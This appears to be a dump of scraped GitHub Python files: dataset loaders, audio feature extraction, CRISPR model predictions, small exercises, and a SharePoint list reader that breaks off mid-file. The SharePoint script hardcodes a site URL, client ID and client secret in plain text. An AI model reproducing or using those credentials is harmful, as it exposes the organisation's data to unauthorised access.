hashed_password\n    db.session.commit()\n    return user\n\n\ndef update_revisit_assignment(revisit, google_prasid):\n    revisit.g_id = google_prasid\n    db.session.commit()\n    return revisit\n\n\nif __name__ == '__main__':\n    from server import app\n    connect_to_db(app)\n","repo_name":"ericachesley/metacognizant","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1453738261","text":"# Given a sorted array in ascending order, find two numbers whose sum equals the target.\n#\n# The function should return the two indices index1 and index2, where index1 must be less than index2.\n#\n# Note:\n# The returned indices (index1 and index2) are not zero-based.\n# You may assume each input has exactly one solution, and you may not use the same element twice.\n# Example:\ntest1 = [0, 0, 3, 4]\ntest = [2, 7, 11, 15]\nsum = 0\n\n\n# Output: [1,2]\n# Explanation: 2 + 7 equals the target 9, therefore index1 = 1, index2 = 2.\n\n\ndef twoSum(numbers, target):\n    dict = {}\n    for i in range(len(numbers)):\n        dict[numbers[i]] = i\n    for j in range(len(numbers)):\n        tmp = target - numbers[j]\n        if tmp in dict and dict[tmp] != j:\n            return [j, dict[tmp]]\n\n    return False\n\n\ntwoSum(test1, sum)\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/twoSumII.py","file_name":"twoSumII.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23097881683","text":"import torch.utils.data\nimport numpy as np\nimport json\nimport os\nimport math, random\nfrom utils.crop_transform import CropBoxTransform\nfrom utils import augmentation\nfrom collections import defaultdict, OrderedDict\nfrom utils.forms_annotations import convertBBs\n\nimport utils.img_f as img_f\n\n#This collate function is for any child class of QADataset\ndef collate(batch):\n    if any(b['mask_label'] is not None for b in batch):\n        mask_labels = []\n        mask_labels_batch_mask = torch.FloatTensor(len(batch))\n        for bi,b in enumerate(batch):\n            if b['mask_label'] is None:\n                mask_labels_batch_mask[bi]=0\n                mask_labels.append( 
torch.FloatTensor(1,1,b['img'].shape[2],b['img'].shape[3]).fill_(0))\n            else:\n                mask_labels_batch_mask[bi]=1\n                mask_labels.append( b['mask_label'] )\n        mask_labels = torch.cat(mask_labels,dim=0)\n    else:\n        mask_labels = None\n        mask_labels_batch_mask = None\n\n    return {\n        'img': torch.cat([b['img'] for b in batch],dim=0),\n        'imgName': [b.get('imgName') for b in batch],\n        'id': [b.get('id') for b in batch],\n        'scale': [b.get('scale') for b in batch],\n        'cropPoint': [b.get('cropPoint') for b in batch],\n        'questions': [b.get('questions') for b in batch],\n        'answers': [b.get('answers') for b in batch],\n        'metadata': [b.get('metadata') for b in batch],\n        'mask_label': mask_labels,\n        'mask_labels_batch_mask': mask_labels_batch_mask,\n        \"bart_logits\": torch.cat([b['bart_logits'] for b in batch],dim=0) if 'bart_logits' in batch[0] else None,\n        \"bart_last_hidden\": torch.cat([b['bart_last_hidden'] for b in batch],dim=0) if 'bart_last_hidden' in batch[0] else None,\n        \"distill_loss_mask\": torch.cat([b['distill_loss_mask'] for b in batch],dim=0) if 'distill_loss_mask' in batch[0] and batch[0]['distill_loss_mask'] is not None else None,\n        \"noise_token_mask\": torch.cat([b['noise_token_mask'] for b in batch],dim=0) if 'noise_token_mask' in batch[0] and batch[0]['noise_token_mask'] is not None else None,\n    }\n\n#Make a mask channel\ndef getMask(shape,boxes):\n    mask = torch.FloatTensor(1,1,shape[2],shape[3]).fill_(0)\n    for box in boxes:\n        if isinstance(box,list):\n            box = np.array(box)\n        points = box[0:8].reshape(4,2)\n        img_f.fillConvexPoly(mask[0,0],points,1)\n    return mask\n\n#Parent class of almost all datasets used by Dessurt\n#It defines the augmentation and prepares the data (masks and such)\n#Dessurt works with a query input and response, or Question and Answer\nclass QADataset(torch.utils.data.Dataset):\n\n\n    def __init__(self, dirPath=None, split=None, config=None, images=None):\n        self.train = split=='train'\n        self.questions = config.get('questions',1)\n        self.max_qa_len_in = config['max_qa_len_in'] if 'max_qa_len_in' in config else None\n        self.max_qa_len_out = config['max_qa_len_out'] if 'max_qa_len_out' in config else None\n        if self.max_qa_len_in is None and self.max_qa_len_out is None and 'max_qa_len' in config:\n            self.max_qa_len_in = config['max_qa_len']\n            self.max_qa_len_out = config['max_qa_len']\n\n        self.cased = config.get('cased',True)\n\n        self.color = config['color'] if 'color' in config else False #everything with Dessurt is done with grayscale images\n        self.rotate = config['rotation'] if 'rotation' in config else False #whether BBs are not axis aligned, not really used\n\n        if 'crop_params' in config and config['crop_params'] is not None:\n            self.transform = CropBoxTransform(config['crop_params'],self.rotate)\n        else:\n            self.transform = None\n\n        self.rescale_range = config['rescale_range']\n        self.rescale_to_crop_size_first = config['rescale_to_crop_size_first'] if 'rescale_to_crop_size_first' in config else False\n        self.rescale_to_crop_width_first = config['rescale_to_crop_width_first'] if 'rescale_to_crop_width_first' in config else False\n        self.rescale_to_crop_height_first = config['rescale_to_crop_height_first'] if 'rescale_to_crop_height_first' in config else False\n        if self.rescale_to_crop_size_first or self.rescale_to_crop_width_first or self.rescale_to_crop_height_first:\n            self.crop_size = config['crop_params']['crop_size']\n        if type(self.rescale_range) is float:\n            self.rescale_range = [self.rescale_range,self.rescale_range]\n\n        self.rearrange_tall_images = False #used by HW-SQuAD\n\n        
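        #Illustrative config for this constructor (keys mirror the lookups in
        #this __init__; the values are invented for the sketch, not taken from
        #a real Dessurt experiment):
        #  config = {'rescale_range': [0.9, 1.1],
        #            'crop_params': {'crop_size': [1152, 768]},
        #            'questions': 1,
        #            'max_qa_len_in': 640,
        #            'max_qa_len_out': 2560,
        #            'augment_shade': True}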
if 'cache_resized_images' in config:\n #This wasn't used for any of Dessurt's stuff\n self.cache_resized = config['cache_resized_images']\n if self.cache_resized:\n if self.rescale_to_crop_size_first:\n self.cache_path = os.path.join(dirPath,'cache_match{}x{}'.format(*config['crop_params']['crop_size']))\n elif self.rescale_to_crop_width_first:\n self.cache_path = os.path.join(dirPath,'cache_matchHx{}'.format(config['crop_params']['crop_size'][1]))\n else:\n assert not self.rescale_to_crop_width_first\n self.cache_path = os.path.join(dirPath,'cache_'+str(self.rescale_range[1]))\n if not os.path.exists(self.cache_path):\n os.mkdir(self.cache_path)\n else:\n self.cache_resized = False\n\n self.augment_shade = config['augment_shade'] if 'augment_shade' in config else False #Do brightness/contrast augmentation\n self.aug_params = config['additional_aug_params'] if 'additional_aug_params' in config else {}\n\n\n self.do_masks=True\n\n #These are based on EasyOCR, which I did some experiments with\n self.ocr_out_dim = 97\n self.char_to_ocr = \"0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ €ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n self.char_to_ocr = {char:i+1 for i,char in enumerate(self.char_to_ocr)} #+1 as 0 is the blank token\n self.one_hot_conf = 0.9\n\n\n self.crop_to_data = False\n self.crop_to_q = config.get('crop_to_q',False) #Used for training recognition on NAF\n if self.crop_to_q: \n self.min_text_height = config['min_text_height'] #Min text height in rescaling\n\n\n\n\n def __len__(self):\n return len(self.images)\n\n\n #helper function for adding a question-answer pair\n def qaAdd(self,qa,question,answer,bb_ids=None,in_bbs=[],out_bbs=None,mask_bbs=[],noise_token_mask=None):\n #aif all([(pair['question']!=question or for pair in qa]): #prevent duplicate q\n qa.append({\n 'question':question,\n 'answer':answer,\n 'bb_ids':bb_ids,\n 'in_bbs':in_bbs,\n 'out_bbs':out_bbs,\n 'mask_bbs':mask_bbs,\n 'noise_token_mask':noise_token_mask\n })\n\n def __getitem__(self,index):\n return self.getitem(index)\n def getitem(self,index,scaleP=None,cropPoint=None):\n imagePath = self.images[index]['imagePath']\n imageName = self.images[index].get('imageName',imagePath)\n\n annotationPath = self.images[index]['annotationPath']\n #This was originally just the json, but as different datasets have different data, it can be something else\n \n rescaled = self.images[index].get('rescaled',1)\n if isinstance(annotationPath,str) and annotationPath.endswith('.json'):\n try: \n with open(annotationPath) as annFile:\n annotations = json.loads(annFile.read())\n if isinstance(annotations,dict):\n annotations['XX_imageName']=imageName #so I have it\n except FileNotFoundError:\n print(\"ERROR, could not open \"+annotationPath)\n return self.__getitem__((index+1)%self.__len__())\n except json.decoder.JSONDecodeError as e:\n print(e)\n print('Error reading '+annotationPath)\n return self.__getitem__((index+1)%self.__len__())\n else:\n annotations=annotationPath\n\n #Load image\n if imagePath is not None:\n try:\n np_img = img_f.imread(imagePath, 1 if self.color else 0)#*255.0\n except FileNotFoundError as e:\n print(e)\n print('ERROR, could not find: '+imagePath)\n return self.__getitem__((index+1)%self.__len__())\n if np_img is None or np_img.shape[0]==0:\n print(\"ERROR, could not open \"+imagePath)\n return self.__getitem__((index+1)%self.__len__())\n if np_img.max()<=1:\n np_img*=255\n else:\n np_img = None #will get generated from parseAnn\n\n\n if self.crop_to_data:\n #This is used for the IAM 
dataset so we don't include the form prompt text (which would be easy to cheat from)\n #This is used by the NAF dataset to sometimes cut landscape documents in half to have better resolution\n crop, line_bbs = self.getCropAndLines(annotations,np_img.shape)\n x1,y1,x2,y2 = crop\n np_img = np_img[y1:y2,x1:x2]\n \n if self.warp_lines is not None and random.random()scale:\n #The scale is better, so actually to the transformation\n left = np_img[:np_img.shape[0]//2]\n right = np_img[np_img.shape[0]//2:]\n if right.shape[0]>left.shape[0]:\n left = np.pad(left,(0,1))\n np_img = np.concatenate((left,right),axis=1)\n #recompute scale\n scale_height = self.crop_size[0]/np_img.shape[0]\n scale_width = self.crop_size[1]/np_img.shape[1]\n scale = min(scale_height, scale_width)\n \n #Note, this did not change any bounding boxes. This means it can only be used on a dataset that doesn't use bounding boxes (like a question-answering dataset)\n\n partial_rescale = s*scale\n s=partial_rescale\n\n elif self.rescale_to_crop_width_first:\n if rescaled!=1:\n raise NotImplementedError('havent implemented caching with match resizing')\n scale = self.crop_size[1]/np_img.shape[1]\n partial_rescale = s*scale\n s=partial_rescale\n elif self.rescale_to_crop_height_first:\n if rescaled!=1:\n raise NotImplementedError('havent implemented caching with match resizing')\n scale = self.crop_size[0]/np_img.shape[0]\n partial_rescale = s*scale\n s=partial_rescale\n else:\n partial_rescale = s/rescaled\n \n\n #Parse annotation file\n bbs,ids, gen_img, metadata, questions_and_answers = self.parseAnn(annotations,s)\n if bbs is None:\n assert ids is None\n bbs = np.zeros(0)\n ids = []\n\n if self.crop_to_q:\n #crop the image to focus on the text line related to the question\n questions_and_answers = self.images[index]['qa']\n assert len(questions_and_answers)==1\n qa = questions_and_answers[0]\n assert len(qa['in_bbs'])==1\n bb = qa['in_bbs'][0]\n assert len(bb)==16\n bb_height = math.sqrt( ((bb[-4]-bb[-2])**2) + ((bb[-3]-bb[-1])**2) )\n bb_width = math.sqrt( ((bb[-8]-bb[-6])**2) + ((bb[-7]-bb[-5])**2) )\n if bb_height*s < self.min_text_height:\n s=partial_rescale = self.min_text_height/bb_height\n\n if s*bb_width>self.crop_size[1]:\n s=partial_rescale = self.crop_size[1]/bb_width\n \n bb_x = bb[-4]*s\n bb_y = bb[1]*s\n cropPoint_x = max(0,round(bb_x-self.crop_size[1]/2))\n cropPoint_y = max(0,round(bb_y-self.crop_size[0]/2))\n\n if cropPoint_x + self.crop_size[1]>int(s*np_img.shape[1]):\n cropPoint_x -= cropPoint_x + self.crop_size[1] - s*np_img.shape[1]\n if cropPoint_x<0:\n cropPoint_x = 0\n if cropPoint_y + self.crop_size[0]>int(s*np_img.shape[0]):\n cropPoint_y -= cropPoint_y + self.crop_size[0] - s*np_img.shape[0]\n if cropPoint_y<0:\n cropPoint_y = 0\n\n cropPoint = (int(cropPoint_x),int(cropPoint_y))\n \n if (not self.train or self.crop_to_q) and 'qa' in self.images[index]:\n #override questions_and_answers returned by parseAnn\n questions_and_answers = self.images[index]['qa']\n #But the scale doesn't match! 
So fix it\n for qa in questions_and_answers:\n for bb_name in ['in_bbs','out_bbs','mask_bbs']:\n if qa[bb_name] is not None:\n qa[bb_name] = [ [s*v for v in bb] for bb in qa[bb_name] ]\n \n\n\n\n if np_img is None:\n np_img=gen_img #generated image\n\n if partial_rescale!=1:\n np_img = img_f.resize(np_img,(0,0),\n fx=partial_rescale,\n fy=partial_rescale,\n )\n\n\n if len(np_img.shape)==2:\n np_img=np_img[...,None] #add 'color' channel\n if self.color and np_img.shape[2]==1:\n np_img = np.repeat(np_img,3,axis=2) #make color image\n \n #set up for cropping\n # The cropping needs to be aware of bounding boxes\n outmasks=False\n if self.do_masks:\n assert self.questions==1 #only allow 1 qa pair if using masking\n mask_bbs=[]\n mask_ids=[]\n for i,qa in enumerate(questions_and_answers):\n inmask_bbs = qa['in_bbs']\n outmask_bbs = qa['out_bbs']\n blank_bbs = qa['mask_bbs']\n if outmask_bbs is not None:\n outmasks=True\n mask_bbs+=inmask_bbs+outmask_bbs+blank_bbs\n mask_ids+= ['in{}_{}'.format(i,ii) for ii in range(len(inmask_bbs))] + \\\n ['out{}_{}'.format(i,ii) for ii in range(len(outmask_bbs))] + \\\n ['blank{}_{}'.format(i,ii) for ii in range(len(blank_bbs))]\n else:\n mask_bbs+=inmask_bbs+blank_bbs\n mask_ids+= ['in{}_{}'.format(i,ii) for ii in range(len(inmask_bbs))] + \\\n ['blank{}_{}'.format(i,ii) for ii in range(len(blank_bbs))]\n\n mask_bbs = np.array(mask_bbs)\n\n #Do crop\n if self.transform is not None:\n if self.do_masks and len(mask_bbs.shape)==2:\n if (bbs is not None and bbs.shape[0]>0) and mask_bbs.shape[0]>0:\n crop_bbs = np.concatenate([bbs,mask_bbs])\n elif mask_bbs.shape[0]>0:\n crop_bbs = mask_bbs\n else:\n crop_bbs = bbs\n crop_ids = ids+mask_ids\n else:\n crop_bbs = bbs\n crop_ids = ids\n\n out, cropPoint = self.transform({\n \"img\": np_img,\n \"bb_gt\": crop_bbs[None,...],\n 'bb_auxs':crop_ids,\n \n }, cropPoint)\n np_img = out['img'] #cropped image\n\n\n #Get the adjusted bounding boxes\n new_q_inboxes=defaultdict(list)\n if outmasks:\n new_q_outboxes=defaultdict(list)\n else:\n new_q_outboxes=None\n new_q_blankboxes=defaultdict(list)\n new_recog_boxes={}\n if self.do_masks:\n orig_idx=0\n for ii,(bb_id,bb) in enumerate(zip(out['bb_auxs'],out['bb_gt'][0])):\n if type(bb_id) is int:\n assert orig_idx==ii\n orig_idx+=1\n elif bb_id.startswith('in'):\n nums = bb_id[2:].split('_')\n i=int(nums[0])\n new_q_inboxes[i].append(bb)\n elif bb_id.startswith('out'):\n nums = bb_id[3:].split('_')\n i=int(nums[0])\n new_q_outboxes[i].append(bb)\n elif bb_id.startswith('blank'):\n nums = bb_id[5:].split('_')\n i=int(nums[0])\n new_q_blankboxes[i].append(bb)\n elif bb_id.startswith('recog'):\n i=int(bb_id[5:])\n new_recog_boxes[i]=bb\n bbs = out['bb_gt'][0,:orig_idx]\n ids= out['bb_auxs'][:orig_idx]\n\n #Put boxes back in questions_and_answers\n for i in range(len(questions_and_answers)):\n questions_and_answers[i]['in_bbs'] = new_q_inboxes[i]\n if outmasks:\n questions_and_answers[i]['out_bbs'] = new_q_outboxes[i]\n questions_and_answers[i]['mask_bbs'] = new_q_blankboxes[i]\n else:\n bbs = out['bb_gt'][0]\n ids= out['bb_auxs']\n\n\n if questions_and_answers is not None:\n questions=[]\n answers=[]\n questions_and_answers = [qa for qa in questions_and_answers if qa['bb_ids'] is None or all((i in ids) for i in qa['bb_ids'])] #filter out q-a pairs that were cropped out\n\n if questions_and_answers is not None:\n if len(questions_and_answers) > self.questions:\n #select the q-a pairs used for this image\n #Dessurt only uses 1 q-a pairs, as each could have a different input mask\n 
questions_and_answers = random.sample(questions_and_answers,k=self.questions)\n if len(questions_and_answers)==0:\n #Had no questions...\n #weird crops might cause this\n return self.getitem((index+1)%len(self))\n \n new_q_inboxes= [qa['in_bbs'] for qa in questions_and_answers]\n new_q_outboxes= [qa['out_bbs'] for qa in questions_and_answers]\n new_q_blankboxes= [qa['mask_bbs'] for qa in questions_and_answers]\n if self.cased:\n questions = [qa['question'] for qa in questions_and_answers]\n answers = [qa['answer'] for qa in questions_and_answers]\n else:\n questions = [qa['question'].lower() for qa in questions_and_answers]\n answers = [qa['answer'].lower() for qa in questions_and_answers]\n\n if questions_and_answers[0]['noise_token_mask'] is not None:\n assert len(questions_and_answers)==1\n noise_token_mask = questions_and_answers[0]['noise_token_mask']\n else:\n noise_token_mask = None\n else:\n questions=answers=noise_token_mask=None\n\n\n\n\n if self.augment_shade and self.augment_shade>random.random():\n if np_img.shape[2]==3:\n np_img = augmentation.apply_random_color_rotation(np_img)\n np_img = augmentation.apply_tensmeyer_brightness(np_img,**self.aug_params)\n else:\n np_img = augmentation.apply_tensmeyer_brightness(np_img,**self.aug_params)\n\n img = np_img.transpose([2,0,1])[None,...] #from [row,col,color] to [batch,color,row,col]\n img = img.astype(np.float32)\n img = torch.from_numpy(img)\n img = 1.0 - img / 128.0 #ideally the median value would be 0\n\n if self.do_masks:\n assert len(new_q_inboxes)<=1\n assert new_q_outboxes is None or len(new_q_outboxes)<=1\n\n mask = getMask(img.shape,new_q_inboxes[0])\n img = torch.cat((img,mask),dim=1)\n for blank_box in new_q_blankboxes[0]:\n assert(img.shape[1]==2)\n x1,y1,x2,y2,x3,y3,x4,y4 = blank_box[:8]\n img_f.polylines(img[0,0],np.array([(x1,y1),(x2,y2),(x3,y3),(x4,y4)]),True,0) #blank on image\n img_f.polylines(img[0,-1],np.array([(x1,y1),(x2,y2),(x3,y3),(x4,y4)]),True,-1) #flip mask to indicate it was blanked\n\n if outmasks and new_q_outboxes[0] is not None:\n mask_label = getMask(img.shape,new_q_outboxes[0])\n else:\n mask_label = None\n else:\n mask_label = None\n\n\n if bbs is not None:\n bbs = convertBBs(bbs[None,...],self.rotate,0)\n if bbs is not None:\n bbs=bbs[0]\n else:\n bbs = torch.FloatTensor(1,0,5+8+1)\n else:\n bbs = torch.FloatTensor(1,0,5+8+1)\n\n\n\n \n\n return {\n \"img\": img,\n \"imgName\": imageName,\n \"id\": self.images[index].get('id'),\n \"scale\": s,\n \"cropPoint\": cropPoint,\n \"questions\": questions,\n \"answers\": answers,\n \"noise_token_mask\": noise_token_mask,\n \"mask_label\": mask_label,\n \"metadata\": metadata\n }\n\n\n","repo_name":"herobd/dessurt","sub_path":"data_sets/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":22373,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"21"} +{"seq_id":"1011865327","text":"\"\"\" mel-spectrogram computation \"\"\"\nimport librosa\n\nimport numpy as np\nimport os\nimport csv\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\n\ndef calc_spec(filename):\n # computation parameters\n offset = 0\n n_fft = 512\n hop_length = 513\n\n speech = f'./{filename}.wav'\n # y : 1-D numpy float array, audio waveform data\n # sr : sample rate (samples per second), default = 22050Hz\n y, sr = librosa.load(speech, mono=True, sr=16000)\n # trim silence from the start and end of the file, yt: signal after trimming / _: (trimmed length, length of y)\n # top_db: lower is less sensitive -> small noises are also treated as silence -> more is trimmed (everything below max - top_db is regarded as silence)\n yt, _ = librosa.effects.trim(y, top_db=20)\n y = yt\n\n spectrogram = 
librosa.feature.melspectrogram(y, sr=sr, n_fft=n_fft, hop_length=hop_length, n_mels=23)\n spectrogram_db = librosa.power_to_db(spectrogram)\n\n filename1 = filename.replace(\" \", \"\") # remove spaces from the filename\n to_append = {filename1[:-4]}\n # compute the means and append them\n for e in spectrogram_db:\n to_append = np.append(to_append, np.mean(e))\n # compute the variances and append them\n for e in spectrogram_db:\n to_append = np.append(to_append, np.var(e))\n\n input_spec = to_append\n\n return input_spec\n\n\n\n","repo_name":"chs98412/capstone","sub_path":"api/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28537591613","text":"class Employee:\n def __init__(self, first, last, age, sal):\n self.first = first\n self.last = last\n self.age = age\n self.sal = sal\n self.email = first + '.' + last + '@gmail.com'\n\n def marks(self, sub1, sub2, sub3):\n self.sub1 = sub1\n self.sub2 = sub2\n self.sub3 = sub3\n self.total = sub1 + sub2 + sub3\n return self.total\n\n\nemp1 = Employee('san', 'kumar', 13, 50000)\nemp2 = Employee('sanjay', 'kr', 26, 50000)\n\nprint(emp1.email)\nprint('Firstname: {} Lastname: {} Age: {} Email: {}'.format(emp1.first, emp1.last, emp1.age, emp1.email))\nprint('Firstname: {} Lastname: {} Age: {} Email: {}'.format(emp2.first, emp2.last, emp2.age, emp2.email))\n\n\n# marks() is an instance method, so call it on an Employee instance\nprint(emp1.marks(12, 12, 12))\n\n\n# print(marks1.total)\n\n\n# emp1.name = 'san'\n# emp1.age = 23\n# emp1.phone = 23423423423\n# emp1.sal = 232323\n#\n#\n# emp2.name = 'sanjay'\n# emp2.age = 25\n# emp2.phone = 222222\n# emp2.sal = 50000\n#\n# print(emp1.name)\n# print(emp2.name)\n","repo_name":"sanjaykumardbdev/PhoneBook_backup","sub_path":"temp/z_test_py_class.py","file_name":"z_test_py_class.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19095812663","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\n\n#os.chdir(\"/home/wkg/complex_mapping\")\n\nbinding_affs = {}\nwith open(\"binding_affinity_data.csv\", \"r\") as handle:\n for line in handle:\n if not line.startswith(\"pdb_id\"):\n line = line.strip(\"\\n\").split(\",\")\n if line[12] != \"na\":\n binding_affs[line[0]] = line[12]\n \nplanarity = {}\nwith open(\"../planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n planarity[line[0]] = line[1]\n\nplanars = [binding_affs[comp] for comp in binding_affs if planarity[comp.upper()] == \"planar\"]\nnonplanars = [binding_affs[comp] for comp in binding_affs if planarity[comp.upper()] == \"nonplanar\"]\n\nwith open(\"binding_aff_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n","repo_name":"wigasper/ddi-planarity","sub_path":"analysis/binding_affinity_analysis.py","file_name":"binding_affinity_analysis.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27603653283","text":"'''\nUsing python's requests library, retrieve the HTML of the website you created\nthat now lives online at .github.io/\n\nBONUS: extend your python program so that it reads your original HTML file\n and 
returns True if the HTML from the response is the same as\n the contents of the original HTML file.\n'''\n\n\nimport requests\nimport os\n\nurl = \"https://lubcountcooper.github.io/my_sites/\"\nfile = \"/home/robert-jan/Documents/CodingNomads/Extras/my_sites/topics_overview.html\"\n\nwith os.fdopen(os.open(file, os.O_RDONLY), \"r\") as fin:\n original = fin.read()\n\ncontent = requests.get(url).text\n\nif original == content:\n print(True)\nelse:\n print(False)\n\n\n\n\n","repo_name":"LuckyLub/python-onsite","sub_path":"week_04/web_scraping/01_your_page.py","file_name":"01_your_page.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32999817582","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport codecs\nimport pickle\nimport pandas as pd\n\nimport Cas9Emulation as c9\n\n\nimport numpy as np\nfrom tensorflow.keras.models import load_model\n\n\ndef run_croton_predictions(guides):\n\n model = load_model('dockers/chopchop_li_2021/models/CROTON.h5') # load multitask model\n\n for i, guide in enumerate(guides):\n try:\n\n left_seq = guide.downstream5prim + guide.strandedGuideSeq[:-(len(guide.PAM) + 3)]\n left_seq = left_seq[-60:]\n\n right_seq = guide.strandedGuideSeq[-(len(guide.PAM) + 3):] + guide.downstream3prim\n right_seq = right_seq[:60]\n\n seq = left_seq + right_seq\n mid_seq = seq[30:90].decode(\"utf-8\")\n\n seq = one_hot_encode(mid_seq, 'ACGT')\n seq = np.reshape(seq, (1, 60, 4))\n cut_site = len(left_seq)\n\n pred_arr = model.predict(seq)\n pred = pd.DataFrame(pred_arr, columns = [\"del_freq\",\"1_bp_ins\",\"1_bp_del\",\"1_bp_fram\",\"2_bp_fram\",\"fram_freq\"])\n pred_stats = build_stats(pred)\n\n guide.repProfile = pred\n guide.repStats = pred_stats\n except ValueError:\n pass\n\n return guides\n\ndef one_hot_encode(seq, base_map):\n seq = seq.upper()\n mapping = dict(zip(base_map, range(4)))\n seq2 = [mapping[i] for i in seq]\n return np.eye(4)[seq2]\n\n\ndef build_stats(pred):\n\n del_freq = pred.loc[0,'del_freq']\n one_bp_ins = pred.loc[0,'1_bp_ins']\n one_bp_del = pred.loc[0,'1_bp_del']\n one_bp_fram = pred.loc[0,'1_bp_fram']\n two_bp_fram = pred.loc[0,'2_bp_fram']\n fram_freq = pred.loc[0, 'fram_freq']\n\n\n stats = {'Deletion frequency': del_freq.item()*100,\n '1 bp insertion probability': one_bp_ins.item()*100,\n '1 bp deletion probability': one_bp_del.item()*100,\n '1 bp frameshift frequency': one_bp_fram.item()*100,\n '2 bp frameshift frequency': two_bp_fram.item()*100,\n 'Frameshift frequency': fram_freq.item()*100,\n }\n return stats\n\ndef main():\n\n guides = []\n for t in c9.recv_tuples():\n guides.append(c9.tuple_to_cas9(t))\n\n scored_guides = run_croton_predictions(guides)\n\n if not scored_guides:\n exit(1)\n\n tuples = []\n for guide in scored_guides:\n tuples.append(c9.cas9_to_reduced_tuple(guide))\n\n # Encode & print the pickled tuples to STDOUT for the main script to catch.\n print(codecs.encode(pickle.dumps(tuples), 'base64').decode())\n\nif __name__ == \"__main__\":\n main()","repo_name":"JokingHero/p3_chopchop","sub_path":"dockers/chopchop_li_2021/run_croton_prediction.py","file_name":"run_croton_prediction.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218259357","text":"from office365.runtime.auth.authentication_context import AuthenticationContext\nfrom 
office365.sharepoint.client_context import ClientContext\n\n\nclass AutorizacaoSharePoint:\n def __init__(self):\n self.id_autorizacao = None\n self.fornecedor = None\n self.numero_ordem = None\n self.transportador = None\n self.nome_motorista = None\n self.cpf = None\n self.rg = None\n self.cnh = None\n self.cavalo = None\n self.minicipio_cavalo = None\n self.carreta_1 = None\n self.municipio_carreta_1 = None\n self.carreta_2 = None\n self.municipio_carreta_2 = None\n self.tipo_veiculo = None\n self.procedimento_especial = None\n self.numero_eixos = None\n self.quantidade_ordens = None\n self.geradas = None\n self.data_inicio = None\n self.data_final = None\n self.data_execucao = None\n self.ativo = None\n self._id = None\n\n\ndef conn(numero_autorizacao):\n # Defining the connection parameters\n # ID and secret created through the SharePoint portal\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Opening the connection to the REST API\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Fetching the values from the list\n lista_share = ctx.web.lists.get_by_title(\"Autorizações\")\n items = lista_share.get_items()\n ctx.load(items)\n ctx.execute_query()\n for item in items:\n _id = '{0}'.format(item.properties[\"ID\"])\n id_autorizacao = '{0}'.format(item.properties[\"NumAutoriza_x00e7__x00e3_o\"])\n if id_autorizacao == numero_autorizacao:\n id_autorizacao = '{0}'.format(item.properties[\"NumAutoriza_x00e7__x00e3_o\"])\n fornecedor = '{0}'.format(item.properties[\"Fornecedor\"]).strip()\n numero_ordem = '{0}'.format(item.properties[\"uwih\"]).strip()\n transportador = '{0}'.format(item.properties[\"r9n0\"]).strip()\n nome_motorista = '{0}'.format(item.properties[\"yecy\"]).strip()\n cpf = '{0}'.format(item.properties[\"jcvj\"]).strip()\n rg = '{0}'.format(item.properties[\"OData__x006d_vk6\"]).strip()\n cnh = '{0}'.format(item.properties[\"wwof\"]).strip()\n cavalo = '{0}'.format(item.properties[\"qbkd\"]).strip()\n cavalo = cavalo.replace('-', '')\n minicipio_cavalo = '{0}'.format(item.properties[\"hr0e\"]).strip()\n carreta_1 = '{0}'.format(item.properties[\"OData__x006d_cb0\"]).strip()\n carreta_1 = carreta_1.replace('-', '')\n if carreta_1.upper() == 'NONE':\n carreta_1 = ''\n\n municipio_carreta_1 = '{0}'.format(item.properties[\"a8fj\"]).strip()\n if municipio_carreta_1.upper() == 'NONE':\n municipio_carreta_1 = ''\n\n carreta_2 = '{0}'.format(item.properties[\"qdqz\"]).strip()\n carreta_2 = carreta_2.replace('-', '')\n if carreta_2.upper() == 'NONE':\n carreta_2 = ''\n\n municipio_carreta_2 = '{0}'.format(item.properties[\"OData__x0071_aw9\"]).strip()\n if municipio_carreta_2.upper() == 'NONE':\n municipio_carreta_2 = ''\n\n tipo_veiculo = '{0}'.format(item.properties[\"OData__x0065_op5\"])\n procedimento_especial = '{0}'.format(item.properties[\"i0dv\"])\n numero_eixos = '{0}'.format(item.properties[\"ahpu\"])\n quantidade_ordens = '{0}'.format(item.properties[\"hpzf\"])\n geradas = '{0}'.format(item.properties[\"OData__x006d_kv6\"])\n data_inicio = 